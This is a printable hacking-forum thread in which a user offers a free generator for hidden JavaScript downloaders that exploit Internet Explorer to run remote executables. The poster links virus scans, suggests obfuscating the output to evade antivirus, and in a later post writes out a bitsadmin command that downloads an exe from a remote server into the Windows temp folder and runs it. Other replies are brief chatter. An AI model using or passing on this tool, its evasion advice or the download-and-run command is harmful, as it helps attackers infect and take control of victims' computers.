Sinisterly
[FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: [FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD (/Thread-FOR-BEGINNERS-HACXX-JS-DOWNLOADER-IE-RCE-EXPLOIT-2021-FREE-DOWNLOAD)



[FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD - hacxx - 05-08-2021

[Image: HACXX-JS-DOWNLOADER-IE-RCE-EXPLOIT-2021.jpg]

HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021
- Is a js code generator that generate a hidden downloader script that remotely executes exes by exploiting Internet Explorer. To use just type your remote file location and local exe. Once the code is created save as a .js or embed with a html file using the tag script.

Download:
https://oxy.st/d/cQId

Virus Scan: (13/59 - For the generator)
https://www.virustotal.com/gui/file/3ad977a85fa86827aae704f1b100f1c343592b16acf47f6cf2c0b99a4a3ab601/detection

Virus Scan: (8/59 - For the exploit, use a obfuscator)
https://www.virustotal.com/gui/file/73c5bf720a7e8b5e20911dba64a3bdb3ac57e6cbaf7b59bcb45d5246f596bb8d/detection

NOTES:
- The code was made to work from a http server, if executing in IE locally a permission is required.
- One of the detections is JS.Trojan-Downloader.Agent.ob. Based on the virus report guaranties that it does exactly what is described.


RE: [FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD - mothered - 05-08-2021

Moved from the Website & Server Hacking forum to Hacking Tools.


RE: [FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD - hacxx - 05-13-2021

Thanks. Hope this tool is useful to anyone.


RE: [FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD - A1pha - 05-13-2021

This is why I use a mac -_-


RE: [FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD - Mr.Kurd - 05-13-2021

(05-13-2021, 12:01 PM)A1pha Wrote: This is why I use a mac -_-

I don't really think that anyone would use IE nowadays even inside microsoft office... You can try edge I have a thread about that.


RE: [FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD - hacxx - 05-21-2021

For the generator anyone can use the following command line...
Code:
cmd.exe /c bitsadmin /transfer Kunami /download /priority high http://remoteserver.com/1.exe c:\windows\temp\1.exe & start c:\windows\temp\1.exe

(Works on older systems)